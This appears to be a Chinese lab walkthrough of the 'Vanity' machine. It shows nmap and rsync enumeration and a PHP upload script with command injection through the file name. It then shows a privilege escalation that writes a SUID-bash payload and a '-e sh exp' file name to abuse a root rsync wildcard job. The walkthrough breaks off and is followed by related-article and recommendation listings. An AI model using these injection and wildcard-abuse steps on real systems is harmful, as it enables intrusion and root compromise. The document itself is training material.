nmap扫描 
┌──(root㉿kali)-[~]

└─# nmap -p- -A 192.168.167.234

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-09 03:59 UTC

Stats: 0:01:22 elapsed; 0 hosts completed (1 up), 1 undergoing Traceroute

Traceroute Timing: About 32.26% done; ETC: 04:00 (0:00:00 remaining)

Nmap scan report for 192.168.167.234

Host is up (0.072s latency).

Not shown: 65532 closed tcp ports (reset)

PORT    STATE SERVICE VERSION

22/tcp  open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)

| ssh-hostkey:

|   3072 62:36:1a:5c:d3:e3:7b:e1:70:f8:a3:b3:1c:4c:24:38 (RSA)

|   256 ee:25:fc:23:66:05:c0:c1:ec:47:c6:bb:00:c7:4f:53 (ECDSA)

|_  256 83:5c:51:ac:32:e5:3a:21:7c:f6:c2:cd:93:68:58:d8 (ED25519)

80/tcp  open  http    Apache httpd 2.4.41 ((Ubuntu))

|_http-title: Vanity Virus Scanner

|_http-server-header: Apache/2.4.41 (Ubuntu)

873/tcp open  rsync   (protocol version 31)

No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).

TCP/IP fingerprint:

OS:SCAN(V=7.94SVN%E=4%D=11/9%OT=22%CT=1%CU=43814%PV=Y%DS=4%DC=T%G=Y%TM=672E

OS:DE5A%P=x86_64-pc-linux-gnu)SEQ(SP=104%GCD=1%ISR=107%TI=Z%II=I%TS=A)OPS(O

OS:1=M551ST11NW7%O2=M551ST11NW7%O3=M551NNT11NW7%O4=M551ST11NW7%O5=M551ST11N

OS:W7%O6=M551ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN(R

OS:=Y%DF=Y%T=40%W=FAF0%O=M551NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%

OS:RD=0%Q=)T2(R=N)T3(R=N)T4(R=N)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%

OS:Q=)T6(R=N)T7(R=N)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK

OS:=9655%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)

Network Distance: 4 hops

Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 199/tcp)

HOP RTT      ADDRESS

1   69.74 ms 192.168.45.1

2   69.54 ms 192.168.45.254

3   71.50 ms 192.168.251.1

4   71.55 ms 192.168.167.234

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

Nmap done: 1 IP address (1 host up) scanned in 84.89 seconds
rsync查看源码 
┌──(root㉿kali)-[~/lab]

└─# rsync  -rdt rsync://192.168.167.234

source          Web Source

backup          Virus Samples Backup

┌──(root㉿kali)-[~/lab]

└─# rsync  -rdt rsync://192.168.167.234/source

drwxr-xr-x          4,096 2022/10/25 11:31:36 .

-rw-r--r--          2,814 2022/10/25 11:31:36 index.html

-rw-r--r--            155 2022/10/25 11:31:36 style.css

drwxr-xr-x          4,096 2022/10/25 11:31:36 uploads

-rw-r--r--            738 2022/10/25 11:31:36 uploads/upload.php

┌──(root㉿kali)-[~/lab]

└─# rsync  -rdt rsync://192.168.167.234 ./rsyn_shared

source          Web Source

backup          Virus Samples Backup

┌──(root㉿kali)-[~/lab]

└─# ls

apache_2fa  pass

┌──(root㉿kali)-[~/lab]

└─# rsync  -rdt rsync://192.168.167.234/source

drwxr-xr-x          4,096 2022/10/25 11:31:36 .

-rw-r--r--          2,814 2022/10/25 11:31:36 index.html

-rw-r--r--            155 2022/10/25 11:31:36 style.css

drwxr-xr-x          4,096 2022/10/25 11:31:36 uploads

-rw-r--r--            738 2022/10/25 11:31:36 uploads/upload.php

┌──(root㉿kali)-[~/lab]

└─# rsync  -rdt rsync://192.168.167.234/source/uploads/upload.php

-rw-r--r--            738 2022/10/25 11:31:36 upload.php

┌──(root㉿kali)-[~/lab]

└─#  rsync  -av rsync://192.168.167.234/source/uploads/upload.php ./upload.php

receiving incremental file list

upload.php

sent 43 bytes  received 834 bytes  250.57 bytes/sec

total size is 738  speedup is 0.84

┌──(root㉿kali)-[~/lab]

└─# ls

apache_2fa  pass  upload.php

┌──(root㉿kali)-[~/lab]

└─# cat upload.php

<?php

        //Check if the file is well uploaded

        if($_FILES['file']['error'] > 0) { echo 'Error during uploading, try again'; }

        //Set up valid extension

        $extsNotAllowed = array( 'php','php7','php6','phar','phtml','phps','pht','phtm','pgif','shtml','htaccess','inc');

        $extUpload = strtolower( substr( strrchr($_FILES['file']['name'], '.') ,1) ) ;

        //Check if the uploaded file extension is allowed

        if (in_array($extUpload, $extsNotAllowed) ) {

        echo 'File not allowed'; 

        }

    else {

        $name = "{$_FILES['file']['name']}";

        $result = move_uploaded_file($_FILES['file']['tmp_name'], $name);

        if($result){

            system("/usr/bin/clamscan $name");

        }

    }

?>

发现命令执行漏洞getshell



pspy32发现会执行rsync命令定时任务,存在通配符提权

利用通配符提权 
www-data@vanity:/var/www/html/uploads$ rm *

www-data@vanity:/var/www/html/uploads$ echo "chmod +s /bin/bash" > exp

www-data@vanity:/var/www/html/uploads$ chmod 777 *

www-data@vanity:/var/www/html/uploads$ echo > '-e sh exp'

www-data@vanity:/var/www/html/uploads$ ls

Vanity Intermediate 统配符提权的更多相关文章

  1. 2018-2019-2 20165215《网络对抗技术》Exp10 Final Windows本地内核提权+Exploit-Exercises Nebula学习与实践

    目录 PART ONE :Windows本地内核提权 漏洞概述 漏洞原理 漏洞复现 windbg调试本地内核 查看SSDT表和SSDTShadow表 查看窗口站结构体信息 利用Poc验证漏洞 漏洞利用 ...

  2. udf提权方法和出现问题汇总

    一.适用条件 1.目标系统是Windows(Win2000,XP,Win2003): 2.你已经拥有MYSQL的某个用户账号,此账号必须有对mysql的insert和delete权限以创建和抛弃函数( ...

  3. 小白日记23:kali渗透测试之提权(三)--WCE、fgdump、mimikatz

    WCE windows身份认证过程 http://wenku.baidu.com/view/cf2ee127a5e9856a56126017.html #特例在登陆的目标服务器/系统,有一个w摘要安全 ...

  4. kali权限提升之配置不当提权与WCE

    kali权限提升之配置不当提权与WCE 1.利用配置不当提权 2.WCE 3.其他提权 一.利用配置不当提权 与漏洞提权相比更常用的方法 在大部分企业环境下,会有相应的补丁更新策略,因此难以通过相应漏 ...

  5. ECShop全系列版本远程代码执行高危漏洞分析+实战提权

    漏洞概述 ECShop的user.php文件中的display函数的模版变量可控,导致注入,配合注入可达到远程代码执行.攻击者无需登录站点等操作,可以直接远程写入webshell,危害严重. 漏洞评级 ...

  6. 新Windows本地提权漏洞学习(CVE-2019-0841)

    1.这是一个啥漏洞? 睁眼一看,妈呀本地提权,快加入本地提权漏洞利用包里,速度加入.github连接我就不发了.担心被认为是传播黑客工具,咱们在这里单纯学习一下漏洞的原理和部分源代码. 2.文件读写权 ...

  7. Android内核sys_setresuid() Patch提权(CVE-2012-6422)

    让我们的Android ROOT,多一点套路. 一.简单套路 CVE-2012-6422的漏洞利用代码,展示了另一种提权方法.(见附录) 这也是一个mmap驱动接口校验导致映射任意内核地址的洞.将内核 ...

  8. 免考final linux提权与渗透入门——Exploit-Exercise Nebula学习与实践

    免考final linux提权与渗透入门--Exploit-Exercise Nebula学习与实践 0x0 前言 Exploit-Exercise是一系列学习linux下渗透的虚拟环境,官网是htt ...

  9. Linux组和提权

    目 录 第1章 组命名管理**    1 1.1 group组信息和密码信息    1 1.1.1 /etc/group 组账户信息    1 1.1.2 /etc/gshadow 组密码信息     ...

  10. 批处理&提权命令

    提权应用 批处理遍历webshell可访问目录 opendir.readdir.is_dir.is_writable这几个遍历文件夹的函数,在php限制的情况下,找可执行目录就没有优势了. @echo ...

随机推荐

  1. win10子系统docker搭建gitlab Server

    心血来潮想搞一套cicd玩玩,结果开始就掉坑里了. 遇到问题 不会写文,所以语言组织比较差,将就看着吧!就当记录一下这个坑以后没准还能用的上. 参照https://blog.csdn.net/Mono ...

  2. 鸿蒙Navigation拦截器实现页面跳转登录鉴权方案

    我们在进行页面跳转时,很多情况下都得考虑登录状态问题,比如进入个人信息页面,下单交易页面等等.在这些场景下,通常在页面跳转前,会先判断下用户是否已经登录,若已登录,则跳转到相应的目标页面,若没有登录, ...

  3. 使用NTP,该如何同步时间?一文详解!

    ​ 一.NTP通信概述 很多场景中,由于业务需要,模块需要保持正确的系统时钟,才能正常工作.但是模块上电后的初试时间戳是946713600(即2000/01/01,16:00:00),所以同步时钟成为 ...

  4. Taro首个支持鸿蒙的 UI 库,同时还兼容 React Native、小程序、H5

    Taro 4.0 已经推出一段时间了,4.0 版本主要是支持了鸿蒙端的开发以及 Vite 编译工具的支持.duxapp 在这段时间也跟随 Taro 的脚步,实现的对鸿蒙端的支持,并且也将之前的 dux ...

  5. highcharts中的折线图

    折现图表的样式如下所示: 整体的一个设置代码如下: that.options = { title: { text: null }, subtitle: { text: null }, yAxis: { ...

  6. AmplifyImpostors源码阅读

    首先看一下点击Bake按钮后的执行流程: 1.AmplifyImpostorInspector部分 首先点击按钮设置了bakeTexture = true if( GUILayout.Button( ...

  7. 前端好用API之MutationObserver

    前情 一直以来都没有好的方式可以监听元素变化,Mutation events虽然可以监听DOM树结构变化,但是因性能问题和差的兼容问题(Webkit内核不支持)并不推荐使用. MutationObse ...

  8. Python Tkinter 弹窗美化指南

    在Python编程中,Tkinter是标准GUI(图形用户界面)库,它允许开发者创建桌面应用程序.尽管Tkinter提供了基本的窗口和控件功能,但默认的样式和外观往往显得单调.因此,对Tkinter弹 ...

  9. 谈谈 HTTP/2 的协议协商机制

    在过去的几个月里,我写了很多有关 HTTP/2 的文章,也做过好几场相关分享.我在向大家介绍 HTTP/2 的过程中,有一些问题经常会被问到.例如要部署 HTTP/2 一定要先升级到 HTTPS 么? ...

  10. Qt开发经验小技巧236-240

    关于在头文件中定义函数使用static关键字的血的教训. 有时候我们需要将一些常用函数写在一个文件中供很多地方调用,如果写的是 int doxxx{} 这种,在你多个地方引用的时候,肯定会编译报错提示 ...